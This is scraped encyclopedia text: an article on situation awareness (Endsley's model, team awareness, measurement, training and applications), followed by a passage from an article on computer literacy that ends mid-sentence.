Situational awarenessorsituation awareness, often abbreviated asSAis the understanding of an environment, its elements, and how it changes with respect to time or other factors. It is also defined as the perception of the elements in the environment considering time and space, the understanding of their meaning, and the prediction of their status in the near future.[1]It is also defined as adaptive, externally-directed consciousness focused on acquiring knowledge about a dynamic task environment and directed action within that environment.[2] Situation awareness is recognized as a critical foundation for successfuldecision makingin many situations, including the ones which involve the protection of human life and property, such aslaw enforcement,aviation,air traffic control,ship navigation,[3]health care,[4]emergency response, militarycommand and controloperations,transmission system operators,self defense,[5]andoffshore oilandnuclear power plantmanagement.[6] Inadequate situation awareness has been identified as one of the primary causal factors in accidents attributed tohuman error.[7][8][9][10]According to Endsley’s situation awareness theory, when someone meets a dangerous situation, he needs an appropriate and a precise decision-making process which includes pattern recognition and matching, formation of sophisticated frameworks and fundamental knowledge that aids correct decision making.[11] The formal definition of situational awareness is often described as three ascending levels: People with the highest levels of situational awareness not only perceive the relevant information for their goals and decisions, but are also able to integrate that information to understand its meaning or significance, and are able to project likely or possible future scenarios. These higher levels of situational awareness are critical for proactive decision making in demanding environments. Three aspects of situational awareness have been the focus in research: situational awareness states, situational awareness systems, and situational awareness processes.Situational awareness statesrefers to the actual level of awareness people have of the situation.Situational awareness systemsrefers to technologies that are developed to support situational awareness in many environments.Situational awareness processesrefers to the updating of situational awareness states, and what guides the moment-to-moment change of situational awareness.[13] Although the term itself is fairly recent, the concept has roots in the history ofmilitary theory—it is recognizable inSun Tzu'sThe Art of War, for example.[14]The term can be traced to World War I, where it was recognized as a crucial skill for crews in military aircraft.[15] There is evidence that the termsituational awarenesswas first employed at theDouglas Aircraft Companyduring human factors engineering research while developing vertical and horizontal situation displays and evaluating digital-control placement for the next generation of commercial aircraft. Research programs in flight-crew computer interaction[16]and mental workload measurement[17]built on the concept of awareness measurement from a series of experiments that measured contingency awareness during learning,[18][19]and later extended to mental workload and fatigue.[20] Situation awareness appears in the technical literature as early as 1983, when describing the benefits of a prototype touch-screen navigation display.[21]During the early 1980s, integrated “vertical-situation” and “horizontal-situation” displays were being developed for commercial aircraft to replace multiple electro-mechanical instruments. Integrated situation displays combined the information from several instruments enabling more efficient access to critical flight parameters, thereby improving situational awareness and reducing pilot workload. The term was first defined formally by Endsley in 1988.[22]Before being widely adopted byhuman factorsscientists in the 1990s, the term is said to have been used byUnited States Air Force(USAF) fighter aircrew returning from war inKoreaandVietnam.[23]They identified having good SA as the decisive factor in air combat engagements—the "ace factor".[24]Survival in adogfightwas typically a matter of observing the opponent's current move and anticipating his next move a fraction of a second before he could observe and anticipate it himself. USAF pilots also came to equate SA with the "observe" and "orient" phases of the famous observe-orient-decide-act loop (OODA loop), or Boyd cycle, as described by the USAF war theorist Col.John Boyd. In combat, the winning strategy is to "get inside" your opponent's OODA loop, not just by making one's own decisions quicker, but also by having better SA than one's opponent, and even changing the situation in ways that the opponent cannot monitor or even comprehend. Losing one's own SA, in contrast, equates to being "out of the loop". Clearly, SA has far reaching applications, as it is necessary for individuals and teams to function effectively in their environment. Thus, SA has gone far beyond the field of aviation to work being conducted in a wide variety of environments. SA is being studied in such diverse areas asair traffic control,nuclear power plantoperation,emergency response, maritime operations, space, oil and gas drilling, vehicle operation, andhealth care(e.g.anesthesiologyandnursing).[25][26][27][28][29][30][31] The most widely cited and accepted model of SA was developed by Dr.Mica Endsley,[25]which has been shown to be largely supported by research findings.[34]Lee, Cassano-Pinche, and Vicente found that Endsley's Model of SA received 50% more citations following its publication than any other paper in Human Factors compared to other papers in the 30 year period of their review.[35] Endsley's model describes the cognitive processes and mechanisms that are used by people to assess situations to develop SA, and the task and environmental factors that also affect their ability to get SA. It describes in detail the three levels of SA formation: perception, comprehension, and projection. Perception (Level 1 SA): The first step in achieving SA is to perceive the status, attributes, and dynamics of relevant elements in the environment. Thus, Level 1 SA, the most basic level of SA, involves the processes of monitoring, cue detection, and simple recognition, which lead to an awareness of multiple situational elements (objects, events, people, systems, environmental factors) and their current states (locations, conditions, modes, actions). Comprehension (Level 2 SA): The next step in SA formation involves a synthesis of disjointed Level 1 SA elements through the processes of pattern recognition, interpretation, and evaluation. Level 2 SA requires integrating this information to understand how it will impact upon the individual's goals and objectives. This includes developing a comprehensive picture of the world, or of that portion of the world of concern to the individual. Projection (Level 3 SA): The third and highest level of SA involves the ability to project the future actions of the elements in the environment. Level 3 SA is achieved through knowledge of the status and dynamics of the elements and comprehension of the situation (Levels 1 and 2 SA), and then extrapolating this information forward in time to determine how it will affect future states of the operational environment. Endsley's model shows how SA "provides the primary basis for subsequent decision making and performance in the operation of complex, dynamic systems".[36]Although alone it cannot guarantee successful decision making, SA does support the necessary input processes (e.g., cue recognition, situation assessment, prediction) upon which good decisions are based.[37] SA also involves both a temporal and a spatial component. Time is an important concept in SA, as SA is a dynamic construct, changing at a tempo dictated by the actions of individuals, task characteristics, and the surrounding environment. As new inputs enter the system, the individual incorporates them into this mental representation, making changes as necessary in plans and actions in order to achieve the desired goals. SA also involves spatial knowledge about the activities and events occurring in a specific location of interest to the individual. Thus, the concept of SA includes perception, comprehension, and projection of situational information, as well as temporal and spatial components. Endsley's model of SA illustrates several variables that can influence the development and maintenance of SA, including individual, task, and environmental factors. In summary, the model consists of several key factors that describe the cognitive processes involved in SA:[38] The model also points to a number of features of the task and environment that affect SA: Experience and training have a significant impact on people's ability to develop SA, due to its impact on the development of mental models that reduce processing demands and help people to better prioritize their goals.[40]In addition, it has been found that individuals vary in their ability to acquire SA; thus, simply providing the same system and training will not ensure similar SA across different individuals. Research has shown that there are a number of factors that make some people better at SA than others including differences in spatial abilities and multi-tasking skills.[41] Criticisms of the SA construct and the model are generally viewed as unfounded and addressed.[42][43][44]The Endsleymodelis very detailed in describing the exact cognitive processes involved in SA. A narrative literature review of SA, performance, and other human factors constructs states that SA “... is valuable in understanding and predicting human-system performance in complex systems.”[42] Nevertheless, there are several criticisms of SA. One criticism is the danger of circularity with SA: “How does one know that SA was lost? Because the human responded inappropriately. Why did the human respond inappropriately? Because SA was lost.”[45]Building on the circularity concern, others deemed SA a folk model on the basis it is frequently overgeneralized and immune to falsification.[46][47]A response to these criticisms it arguing that measures of SA are “... falsifiable in terms of their usefulness in prediction.”[42] A recent review and meta-analysis of SA measures showed they were highly correlated or predictive of performance, which initially appears to provide strong quantitative evidence refuting criticisms of SA.[44]However, the inclusion criteria in this meta-analysis[44]was limited to positive correlations reaching desirable levels of statistical significance.[48]That is, more desirable results hypothesis supporting results were included while the less desirable results, contradicting the hypothesis, were excluded. The justification was "Not all measures of SA are relevant to performance."[44]This an example of a circular analysis or double-dipping,[49]where the dataset being analyzed are selected based on the outcome from analyzing the same dataset. Because only more desirable effects were included, the results of this meta-analysis were predetermined – predictive measures of SA were predictive.[48]Further, there were inflated estimates of mean effect sizes compared to an analysis that did not select results using statistical significance.[48]Determining the relevance of SA based on the desirability of outcomes and analyzing only supporting results is a circular conceptualization of SA and revives concerns about the falsifiability of SA.[48] Several cognitive processes related to situation awareness are briefly described in this section. The matrix shown below attempts to illustrate the relationship among some of these concepts.[50]Note thatsituation awarenessandsituational assessmentare more commonly discussed in information fusion complex domains such as aviation and military operations and relate more to achieving immediate tactical objectives.[51][52][53]Sensemakingand achievingunderstandingare more commonly found in industry and the organizational psychology literature and often relate to achieving long-term strategic objectives. There are also biological mediators of situational awareness, most notably hormones such astestosterone, andneurotransmitterssuch asdopamineandnorepinephrine.[54] Situation awareness is sometimes confused with the term "situational understanding." In the context of military command and control applications, situational understanding refers to the "product of applying analysis and judgment to the unit's situation awareness to determine the relationships of the factors present and form logical conclusions concerning threats to the force or mission accomplishment, opportunities for mission accomplishment, and gaps in information".[55]Situational understanding is the same as Level 2 SA in the Endsley model—the comprehension of the meaning of the information as integrated with each other and in terms of the individual's goals. It is the "so what" of the data that is perceived. In brief,situation awarenessis viewed as "a state of knowledge," andsituational assessmentas "the processes" used to achieve that knowledge. Endsley argues that "it is important to distinguish the term situation awareness, as a state of knowledge, from the processes used to achieve that state.[1]These processes, which may vary widely among individuals and contexts, will be referred to as situational assessment or the process of achieving, acquiring, or maintaining SA." Note that SA is not only produced by the processes of situational assessment, it also drives those same processes in a recurrent fashion. For example, one's current awareness can determine what one pays attention to next and how one interprets the information perceived.[56] Accurate mental models are one of the prerequisites for achieving SA.[22][57][58]Amental modelcan be described as a set of well-defined, highly organized yet dynamic knowledge structures developed over time from experience.[59][60]The volume of available data inherent in complex operational environments can overwhelm the capability of novice decision makers to attend, process, and integrate this information efficiently, resulting ininformation overloadand negatively impacting their SA.[61]In contrast, experienced decision makers assess and interpret the current situation (Level 1 and 2 SA) and select an appropriate action based on conceptual patterns stored in theirlong-term memoryas "mental models".[62][63]Cues in the environment activate these mental models, which in turn guide their decision making process. Klein, Moon, and Hoffman distinguish between situation awareness andsensemakingas follows: ...situation awareness is about the knowledge state that's achieved—either knowledge of current data elements, or inferences drawn from these data, or predictions that can be made using these inferences. In contrast, sensemaking is about the process of achieving these kinds of outcomes, the strategies, and the barriers encountered.[64] In brief, sensemaking is viewed more as "a motivated, continuous effort to understand connections (which can be among people, places, and events) in order to anticipate their trajectories and act effectively",[65]rather than the state ofknowledgeunderlying situation awareness. Endsley points out that as an effortful process, sensemaking is actually considering a subset of the processes used to maintain situation awareness.[66][43]In the vast majority of the cases, SA is instantaneous and effortless, proceeding frompattern recognitionof key factors in the environment—"The speed of operations in activities such as sports, driving, flying and air traffic control practically prohibits such conscious deliberation in the majority of cases, but rather reserves it for the exceptions." Endsley also points out that sensemaking is backward focused, forming reasons for past events, while situation awareness is typically forward looking, projecting what is likely to happen in order to inform effective decision processes.[66][43] In many systems and organizations, people work not just as individuals, but as members of a team. Thus, it is necessary to consider the SA of not just individual team members, but also the SA of the team as a whole. To begin to understand what is needed for SA within teams, it is first necessary to clearly define what constitutes a team. A team is not just any group of individuals; rather teams have a few defining characteristics. A team is: a distinguishable set of two or more people who interact dynamically, interdependently and adaptively toward a common and valued goal/objective/mission, who have each been assigned specific roles or functions to perform, and who have a limited life span of membership. Team SA is defined as "the degree to which every team member possesses the SA required for his or her responsibilities".[38]The success or failure of a team depends on the success or failure of each of its team members. If any one of the team members has poor SA, it can lead to a critical error in performance that can undermine the success of the entire team. By this definition, each team member needs to have a high level of SA on those factors that are relevant for his or her job. It is not sufficient for one member of the team to be aware of critical information if the team member who needs that information is not aware. Therefore, team members need to be successful in communicating information between them (including how they are interpreting or projecting changes in the situation to form level 2 and 3 SA) or in each independently being able to get the information they need. In a team, each member has a subgoal pertinent to his/her specific role that feeds into the overall team goal. Associated with each member's subgoal are a set of SA elements about which he/she is concerned. As the members of a team are essentially interdependent in meeting the overall team goal, some overlap between each member's subgoal and their SA requirements will be present. It is this subset of information that constitutes much of team coordination. That coordination may occur as a verbal exchange, a duplication of displayed information, or by some other means.[68] Shared situation awareness can be defined as "the degree to which team members possess the same SA on shared SA requirements".[69][70]As implied by this definition, there are information requirements that are relevant to multiple team members. A major part of teamwork involves the area where these SA requirements overlap—the shared SA requirements that exist as a function of the essential interdependency of the team members. In a poorly functioning team, two or more members may have different assessments on these shared SA requirements and thus behave in an uncoordinated or even counter-productive fashion. Yet in a smoothly functioning team, each team member shares a common understanding of what is happening on those SA elements that are common—shared SA. Thus, shared SA refers to degree to which people have a common understanding on information that is in the overlap of the SA requirements of the team members. Not all information needs to be shared. Clearly, each team member is aware of much that is not pertinent to the others on the team. Sharing every detail of each person's job would creates information overload to sort through to get needed information.[71][72]It is only that information which is relevant to the SA requirements of each team member that needs to be shared. The situation awareness of the team as a whole, therefore, is dependent upon both a high level of SA among individual team members for the aspects of the situation necessary for their job; and a high level of shared SA between team members, providing an accurate common operating picture of those aspects of the situation common to the needs of each member.[73]Endsley and Jones[57][73]describe a model of team situation awareness as a means of conceptualizing how teams develop high levels of shared SA across members. Each of these four factors—requirements, devices, mechanisms and processes—act to help build team and shared SA. Intime-criticaldecision-makingprocesses, swift and effective choices are imperative to address and navigate urgent situations. In such scenarios, the ability to analyze information rapidly, prioritize key factors, and execute decisions promptly becomes paramount. Time constraints often necessitate a balance between thoroughdeliberationand the need for quick action. The decision-maker must rely on a combination ofexperience,intuition, and available data to make informed choices under pressure. Prioritizingcritical elements, assessing potential outcomes, and considering the immediate and long-term consequences are crucial aspects of effective time-critical decision-making. Furthermore, clearcommunicationis essential to ensure that decisions are swiftly conveyed to relevantstakeholdersand executed seamlessly. Collaborative efforts, streamlined processes, and well-defined protocols can enhance the efficiency of decision-making in time-sensitive situations. Adaptabilityand the ability to recalibrate strategies in real-time are vital attributes in time-critical scenarios, as unforeseen developments may require rapid adjustments to the initial decision. Embracing technological advancements anddata-driveninsights, and incorporating simulation exercises, can also contribute to better decision-making outcomes in high-pressure situations. Ultimately, successful time-critical decision-making involves a combination of expertise, preparedness, effective communication, and a willingness to adapt, ensuring that the chosen course of action aligns with the urgency of the situation while minimizing the risk of errors. While the SA construct has been widely researched, the multivariate nature of SA poses a considerable challenge to its quantification and measurement.[a]In general, techniques vary in terms of direct measurement of SA (e.g., objective real-time probes or subjective questionnaires assessing perceived SA) or methods that infer SA based on operator behavior or performance. Direct measures are typically considered to be "product-oriented" in that these techniques assess an SA outcome; inferred measures are considered to be "process-oriented," focusing on the underlying processes or mechanisms required to achieve SA.[74]These SA measurement approaches are further described next. Objective measures directly assess SA by comparing an individual's perceptions of the situation or environment to some "ground truth" reality. Specifically, objective measures collect data from the individual on his or her perceptions of the situation and compare them to what is actually happening to score the accuracy of their SA at a given moment in time. Thus, this type of assessment provides a direct measure of SA and does not require operators or observers to make judgments about situational knowledge on the basis of incomplete information. Objective measures can be gathered in one of three ways: real-time as the task is completed (e.g., "real-time probes" presented as open questions embedded as verbal communications during the task[75]), during an interruption in task performance (e.g., situation awareness global assessment technique (SAGAT),[32]or the WOMBAT situational awareness and stress tolerance test mostly used in aviation since the late 1980s and often called HUPEX in Europe), or post-test following completion of the task. Subjective measures directly assess SA by asking individuals to rate their own or the observed SA of individuals on an anchored scale (e.g., participant situation awareness questionnaire;[76]the situation awareness rating technique[77]). Subjective measures of SA are attractive in that they are relatively straightforward and easy to administer. However, several limitations should be noted. Individuals making subjective assessments of their own SA are often unaware of information they do not know (theunknown unknowns). Subjective measures also tend to be global in nature, and, as such, do not fully exploit the multivariate nature of SA to provide the detailed diagnostics available with objective measures. Nevertheless, self-ratings may be useful in that they can provide an assessment of operators' degree of confidence in their SA and their own performance. Measuring how SA is perceived by the operator may provide information as important as the operator's actual SA, since errors in perceived SA quality (over-confidence or under-confidence in SA) may have just as harmful an effect on an individual's or team's decision-making as errors in their actual SA.[78] Subjective estimates of an individual's SA may also be made by experienced observers (e.g., peers, commanders, or trained external experts). These observer ratings may be somewhat superior to self-ratings of SA because more information about the true state of the environment is usually available to the observer than to the operator, who may be focused on performing the task (i.e., trained observers may have more complete knowledge of the situation). However, observers have only limited knowledge about the operator's concept of the situation and cannot have complete insight into the mental state of the individual being evaluated. Thus, observers are forced to rely more on operators' observable actions and verbalizations in order to infer their level of SA. In this case, such actions and verbalizations are best assessed using performance and behavioral measures of SA, as described next. Performance measures infer SA from the end result (i.e., task performance outcomes), based on the assumption that better performance indicates better SA. Common performance metrics include quantity of output or productivity level, time to perform the task or respond to an event, and the accuracy of the response or, conversely, the number of errors committed. The main advantage of performance measures is that these can be collected objectively and without disrupting task performance. However, although evidence exists to suggest a positive relation between SA and performance, this connection is probabilistic and not always direct and unequivocal.[25]In other words, good SA does not always lead to good performance and poor SA does not always lead to poor performance.[79]Thus, performance measures should be used in conjunction with others measures of SA that directly assess this construct. Behavioral measures also infer SA from the actions that individuals choose to take, based on the assumption that good actions will follow from good SA and vice versa. Behavioral measures rely primarily on observer ratings, and are, thus, somewhat subjective in nature. To address this limitation, observers can be asked to evaluate the degree to which individuals are carrying out actions and exhibiting behaviors that would be expected to promote the achievement of higher levels of SA.[b]This approach removes some of the subjectivity associated with making judgments about an individual's internal state of knowledge by allowing them to make judgments about SA indicators that are more readily observable. Process indices examine how individuals process information in their environment, such as by analyzing communication patterns between team members or using eye tracking devices. Team communication (particularly verbal communication) supports the knowledge building and information processing that leads to SA construction.[57]Thus, since SA may be distributed via communication, computational linguistics and machine learning techniques can be combined with natural language analytical techniques (e.g.,Latent semantic analysis) to create models that draw on the verbal expressions of the team to predict SA and task performance.[81][82]Although evidence exists to support the utility of communication analysis for predicting team SA,[83]time constraints and technological limitations (e.g., cost and availability of speech recording systems and speech-to-text translation software) may make this approach less practical and viable in time-pressured, fast-paced operations. Psycho-physiological measures also serve as process indices of operator SA by providing an assessment of the relationship between human performance and a corrected change in the operator's physiology.[84]In other words, cognitive activity is associated with changes in the operator's physiological states. For example, the operator's overall functional state (as assessed using psycho-physiological measures, such aselectroencephalographydata, eyeblinks, and cardiac activity) may provide an indication as to whether the operator is sleep fatigued at one end of the continuum, or mentally overloaded at the other end.[85]Other psycho-physiological measures, such asevent-related potentials, event-related desynchronization, transient heart rate, andelectrodermal activity, may be useful for evaluating an operator's perception of critical environmental cues, that is, to determine if the operator has detected and perceived a task-relevant stimulus.[85]In addition, it is also possible to use psycho-physiological measures to monitor operators' environmental expectancies, that is, their physiological responses to upcoming events, as a measure of their current level of SA.[85] The multivariate nature of SA significantly complicates its quantification and measurement, as it is conceivable that a metric may only tap into one aspect of the operator's SA. Further, studies have shown that different types of SA measures do not always correlate strongly with each other.[c]Accordingly, rather than rely on a single approach or metric, valid and reliable measurement of SA should utilize a battery of distinct yet related measures that complement each other.[86]Such a multi-faced approach to SA measurement capitalizes on the strengths of each measure while minimizing the limitations inherent in each. Situation awareness is limited by sensory input and available attention, by the individual's knowledge and experience, and by their ability to analyse the available information effectively. Attention is a limited resource, and may be reduced by distraction and task loading. Comprehension of the situation and projection of future status depend heavily on relevant knowledge, understanding, and experience in similar environments. Team SA is less limited by these factors, as there is a wider knowledge and experience base, but it is limited by the effectiveness of communication within the team.[87] Following Endsley's paradigm and with cognitive resource management model[88]with neurofeedback techniques, Spanish Pedagogist María Gabriela López García (2010) implemented and developed a new SA training pattern.[89]The first organization to implement this new pattern design by López García is the SPAF (Spanish Air Force). She has trained EF-18 fighter pilots and Canadair firefighters.[90] This situation awareness training aims to avoid losing SA and provide pilots cognitive resources to always operate below the maximum workload that they can withstand. This provides not only a lower probability of incidents and accidents by human factors, but the hours of operation are at their optimum efficiency, extending the operating life of systems and operators.[91] Infirst aidmedical training provided by theAmerican Red Cross, the need to be aware of the situation within the area of influence as one approaches an individual requiring medical assistance is the first aspect for responders to consider[92]Examining the area and being aware of potential hazards, including the hazards which may have caused the injuries being treated, is an effort to ensure that responders do not themselves get injured and require treatment as well. Situation awareness for first responders in medical situations also includes evaluating and understanding what happened[93]to avoid injury of responders and also to provide information to other rescue agencies which may need to know what the situation is via radio prior to their arrival on the scene. In a medical context, situation awareness is applied to avoid further injury to already-injured individuals, to avoid injury to medical responders, and to inform other potential responders of hazardous conditions prior to their arrival. A loss in situational awareness has led to many transportation accidents, including the1991 Los Angeles Airport runway collision[94]and the2015 Philadelphia train derailment.[95] Within thesearch and rescuecontext, situational awareness is applied primarily to avoid injury to search crews by being aware of the environment, the lay of the land, and the many other factors of influence within one's surroundings assists in the location of injured or missing individuals.[96]Public safety agencies are increasingly using situational awareness applications likeAndroid Tactical Assault Kiton mobile devices and even robots to improve situational awareness.[97] In theUnited States Forest Servicethe use ofchainsawsandcrosscut sawsrequires training and certification.[98]A great deal of that training describes situational awareness as an approach toward environmental awareness but also self-awareness[99]which includes being aware of one's own emotional attitude, tiredness, and even caloric intake. Situational awareness in the forest context also includes evaluating the environment and the potential safety hazards within a saw crew's area of influence. As a sawyer approaches a task, the ground, wind, cloud cover, hillsides, and many other factors are examined and are considered proactively as part of trained sawyers' ingrained training. Dead or diseased trees within the reach of saw team crews are evaluated, the strength and direction of the wind is evaluated. The lay of tree sections to be bucked or the lean of a tree to be felled is evaluated within the context of being aware of where the tree will fall or move to when cut, where the other members of the saw team are located, how they are moving, whether hikers are within the area of influence, whether hikers are moving or are stationary. Law enforcementtraining includes being situationally aware of what is going on around the police officer before, during, and after interactions with the general public[100]while also being fully aware of what is happening around the officer in areas not currently the focus of an officer's immediate task. In cybersecurity, consider situational awareness, for threat operations, is being able to perceive threat activity and vulnerability in context so that the following can be actively defended: data, information, knowledge, and wisdom from compromise. Situational awareness is achieved by developing and using solutions that often consume data and information from many different sources. Technology and algorithms are then used to apply knowledge and wisdom in order to discern patterns of behavior that point to possible, probable, and real threats. Situational awareness for cybersecurity threat operations teams appears in the form of a condensed, enriched, often graphical, prioritized, and easily searchable view of systems that are inside or related to security areas of responsibility (such as corporate networks or those used for national security interests). Different studies have analyzed the perception of security and privacy in the context of eHealth,[101]network security,[102]or using collaborative approaches to improve the awareness of users.[103]There are also research efforts to automate the processing of communication network information in order to obtain or improve cyber-situational awareness.[104] As the capabilities of technological agents increases, it becomes more important that their actions and underlying rational becomes transparent. In the military realm, agent transparency has been investigated asunmanned vehiclesare being employed more frequently. In 2014, researchers at theU.S. Army Research Laboratoryreported the Situation Awareness-based Agent Transparency (SAT), a model designed to increase transparency through user interface design. When it comes to automation, six barriers have been determined to discourage "human trust in autonomous systems, with 'low observability, predictability, directability and auditability' and 'low mutual understanding of common goals' being among the key issues."[105]The researchers at theUS Army Research Laboratorydesigned three levels of situational awareness transparency based onEndsley's theoryof perception, comprehension, and projection. The greater the level of situational awareness, they claimed, the more information the agent conveys to the user.[106] A 2018 publication from theU.S. Army Research Laboratoryevaluated how varying transparency levels in the SAT affects the operator workload and a human's understanding of when it is necessary to intervene in the agent's decision making. The researchers refer to this supervisory judgement as calibration. The group split their SAT model research into two efforts: the Intelligent Agent Transparency in Human Agent Transparency for Multi UxV Management (IMPACT) and the Autonomous Squad Member (ASM) projects.[105] Scientists provided three standard levels of SAT in addition to a fourth level which included the agent's level of uncertainty in its decision in unmanned vehicles. The stated goal of this research was to determine how modifying levels of SAT affected user performance, situation awareness, and confidence in the agent. The scientists stated that their experimental results support that increased agent transparency improved the performance of the operator and human confidence on the agent without a significant effect on the workload. When the agent communicated levels of uncertainty in the task assigned, those involved in the experimentation displayed more trust in the agent.[107] The ASM research was conducted by providing a simulation game in which the participant had to complete a training course with an ASM, a ground robot that communicates with infantry. The participants had to multitask, evaluating potential threats while monitoring the ASM's communications on the interface. According to that research, experimental results demonstrated that the greatest confidence calibration occurred when the agent communicated information of all three levels of SAT.[107]The group of scientists from the U.S. Army Research Laboratory developed transparency visualization concepts in which the agents can communicate their plans, motivations, and projected outcomes through icons. The agent has been reported to be able to relate its resource usage, reasoning, predicted resource loss, progress towards task completion, etc.[105]Unlike in the IMPACT research, the agent informing the user of its level of uncertainty in decision making, no increase in trust was observed.[107] Crowdsourcing, made possible by the rise ofsocial mediaand ubiquitous mobile access has a potential for considerably enhancing situation awareness of both responsible authorities and citizens themselves for emergency and crisis situations by employing or using "citizens as sensors".[108][109][110][111][112][113][114][115]For instance, analysis of content posted on online social media likeFacebookandTwitterusingdata mining,machine learningandnatural language processingtechniques may provide situational information.[115]A crowdsourcing approach to sensing, particularly in crisis situations, has been referred to ascrowdsensing.[116]Crowdmappingis a subtype of crowdsourcing[117][118]by whichaggregationof crowd-generated inputs such as captured communications and social media feeds are combined withgeographic datato create adigital mapthat is as up-to-date as possible[119][120][121][122]that can improve situational awareness during an incident and be used to support incident response.[123] A Cloud-based Geographic Information System (GIS) with a display of structured data refers to a system that utilizescloud computingtechnology to store, manage, analyze, and visualize geographic data in a structured format. This approach offers several advantages, includingaccessibility,scalability, andcollaboration, compared to traditional on-premises GIS systems. Here's a breakdown of the key components: Cloud-Based Infrastructure: Geographic Information System (GIS): Structured Data Storage: Data Analysis and Processing: Visualization Tools: Collaborative Features: Real-Time Updates: Integration with Other Cloud Services: Overall, a cloud-based GIS with structured data display provides a dynamic and efficient platform for managing geographic information, making it accessible, scalable, and collaborative for a wide range of applications, from urban planning and environmental monitoring to business analytics and disaster response. There are two training scenarios designed to increase the situational awareness skills of military professionals, and first responders in police and emergency services. The first,Kim's Game, has a more common place in the Marine Corps sniper school and police academies. The name is derived from the novelKimwhich references the game to a spy school lesson. The game involves a tray with various items such as spoons, pencils, bullets, and any other items the soldiers would be familiar with. The participants are given one minute to view all of these items before they are covered up with a blanket. The participants would then individually list the items that they saw, the one with the most correct answers would win the game. The same game is played in young scouting and girl guide groups as well to teach children quick memorisation skills. The second method is a more practical military application of Kim's Game. It starts with a field area (jungle, bush or forest) of about five meters wide to 10 meters deep where various items, some camouflaged and some not, to be located in the area on the ground and in the trees at eyesight level. Again, these items would be ones that are familiar to the soldiers undergoing the exercise. The participants would be given 10 minutes to view the area from one place and take a mental note of the items they saw. Once their 10 minutes is up, the soldier would then be required to do a repetition of certain exercises such asburpees, designed to simulate the stress of a physically demanding environment. Once the participant completes the exercise, they would list the items they saw. The points would be tallied in the end to find the winner.
https://en.wikipedia.org/wiki/Situation_awareness
Computer literacyis defined as the knowledge and ability to usecomputersand related technology efficiently, with skill levels ranging from elementary use tocomputer programmingand advanced problem solving. Computer literacy can also refer to the comfort level someone has with using computer programs and applications. Another valuable component is understanding how computers work and operate. Computer literacy may be distinguished from computer programming, which primarily focuses on the design and coding of computer programs rather than the familiarity and skill in their use.[1]Various countries, including the United Kingdom and the United States, have created initiatives to improve national computer literacy rates. Computer literacy differs fromdigital literacy, which is the ability to communicate or find information on digital platforms.[2]Comparatively, computer literacy measures the ability to use computers and to maintain a basic understanding of how they operate.[3] A person's computer literacy is commonly measured through questionnaires, which test their ability to write and modify text,trouble-shootminor computer operating issues, and organize and analyze information on a computer.[4][5] To increase their computer literacy, computer users should distinguish which computer skills they want to improve, and learn to be more purposeful and accurate in their use of these skills. By learning more about computer literacy, users can discover more computer functions that are worth using.[6] Arguments for the use of computers in classroom settings, and thus for the promotion of computer literacy, are primarilyvocationalor practical. Computers are essential in the modern-day workplace.[4]The instruction of computer literacy in education is intended to provide students with employable skills.[1] Rapid changes in technology make it difficult to predict the next five years of computer literacy. Computer literacy projects have support in many countries because they conform to general political and economic principles of those countries' public and private organizations. The Internet offers great potential for the effective and widespread dissemination of knowledge and for the integration of technological advances. Improvements in computer literacy facilitate this.[7] The term "computer literacy" is usually attributed to Arthur Luehrmann, a physicist atDartmouth Collegewho was a colleague ofKemenyandKurtzwho introduced theBASIC programming languagein 1964. Luehrmann became a tireless advocate of computers in teaching. At an April 1972American Federation of Information Processing Societies(AFIPS) conference, Luehrmann gave a talk titled "Should the computer teach the student, or vice-versa?" The paper is available online. In it he notes: If the computer is so powerful a resource that it can be programmed to simulate the instructional process, shouldn’t we be teaching our students mastery of this powerful intellectual tool? Is it enough that a student be the subject of computer administered instruction—the enduser of a new technology? Or should his education also include learning to use the computer (1) to get information in the social sciences from a large database inquiry system, or (2) to simulate an ecological system, or (3) to solve problems by using algorithms, or (4) to acquire laboratory data and analyze it, or (5) to represent textual information for editing and analysis, or (6) to represent musical information for analysis, or (7) to create and process graphical information? These uses of computers in education cause students to become masters of computing, not merely its subjects. In 1978, Andrew Molnar was director of the Office of Computing Activities at theNational Science Foundationin the United States.[8][9]Shortly after its formation, computer literacy was discussed in several academic articles. In 1985 theJournal of Higher Educationasserted that being computer literate involved mastering word processing, spreadsheet programs, and retrieving and sharing information on a computer.[10] Computer science and education researchersSeymour Papert,Cynthia Solomon, andDaniel McCrackenadvocated for programming as a rich and beneficial activity for young and old learners. In the 1970s and 1980s, creative technical writers includingBob Albrecht,David Ahl,Mitchell Waite,Peter Norton, andDan Gookincreated books and materials that taught computer programming to non-specialists and self-taught learners.[11]While programming lost traction in school districts as the core element of computer literacy, it gained ground in computer labs, user groups, community centers and other informal settings, helping to propel the personal computer as a mass-market commercial product. Plan Calculwas a French governmental program in the 1960s to promote a national or European computer industry that was accompanied with a vast educational effort in programming and computer science. TheComputing for Allplan was aFrench governmentinitiative to introduce computers to all the country's pupils in 1985. In the United Kingdom, a number of prominent video game developers emerged in the late 1970s and early 1980s.[12]TheZX Spectrum, released in 1982, helped to popularize home computing, coding, and gaming in Britain and Europe.[13][14][15] TheBBC Computer Literacy Project, using theBBC Microcomputer, ran from 1980 to 1989. This initiative educated a generation of coders in schools and at home. This was before the development of mass-market PCs in the 1990s.[16][17]'Bedroom computer innovation' led to the development of early web-hosting companies aimed at businesses and individuals in the 1990s.[18] TheBBC Computer Literacy Project 2012was an initiative to develop students' marketableinformation technologyandcomputer scienceskills. Computer programming skills were introduced into theNational Curriculumin 2014.[19][20] It was reported in 2017 that roughly 11.5 million United Kingdom citizens did not have basic computer literacy skills.[21]In response, the United Kingdom government published a 'digital skills strategy' in 2017.[21][22][23] First released in 2012, theRaspberry Piis a series of low-cost single-board computers originally intended to promote the teaching of basiccomputer sciencein schools in the UK.[24][25][26]Later, they became far more popular than anticipated, and have been used in a wide variety of applications.[27]TheRaspberry Pi Foundationpromotes the teaching of elementary computer science in UK schools and in developing countries.[28] In 1978, theNational Science Foundationput out a call to educate young people in computer programming.[29]To introduce students to computing, the U.S. government, private foundations and universities combined to fund and staff summer programs for high school students.[30][29] Students in the United States are introduced totablet computersin preschool or kindergarten.[31]Tablet computers are preferred for their small size andtouchscreens.[32]Thetouch user interfaceof a tablet computer is more accessible to the under-developedmotor skillsof young children.[33]Early childhood educators use student-centered instruction to guide young students through various activities on the tablet computer.[34]This typically includes Internet browsing and the use of applications, familiarizing the young student with a basic level of computer proficiency.[33] A concern raised within this topic of discussion is that primary and secondary education teachers are often not equipped with the skills to teach basic computer literacy.[31] In the United States job market, computer illiteracy severely limits employment options.[35][36]Non-profit organizations such asPer Scholasattempt to reduce the divide by offering free and low-cost computers to children and their families in under-served communities inSouth Bronx, New York,Miami, FL, and inColumbus, OH.[37] In 2020, world averages in computer literacy, as 